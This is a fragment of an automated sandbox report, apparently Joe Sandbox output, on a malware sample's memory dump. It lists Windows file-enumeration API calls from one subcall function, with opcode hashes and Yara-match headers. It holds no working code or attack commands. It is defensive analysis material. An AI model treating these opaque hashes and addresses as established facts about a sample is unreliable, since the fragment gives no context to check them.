                                                    • Part of subcall function 00B44B77: wsprintfA.USER32 ref: 00B44B93
                                                    • Part of subcall function 00B44B77: FindFirstFileA.KERNEL32(?,?), ref: 00B44BAA
                                                    • Part of subcall function 00B44B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B44BD8
                                                    • Part of subcall function 00B44B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B44BEE
                                                    • Part of subcall function 00B44B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B44DE4
                                                    • Part of subcall function 00B44B77: FindClose.KERNEL32(000000FF), ref: 00B44DF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                  • Instruction ID: 805cc8a4af27ee503beb5b585fc8939d2d8f8fd1c95ce989762b737c98e92db4
                                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                  • Instruction Fuzzy Hash: 8A21B6BAA40208BBC714FBE0DC46EE933BDAB55300F4045C8B68592181DE749BC98BA2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 1206339513-0
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: 08c99fef105b4db4a3c05f156a75b628fcbbb6e3e1a90a30f7e7d31d1907635e
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: 25011A79540208FFCB14DFECD988EAE7BBAEF49394F108148F9098B300C631AA40DB91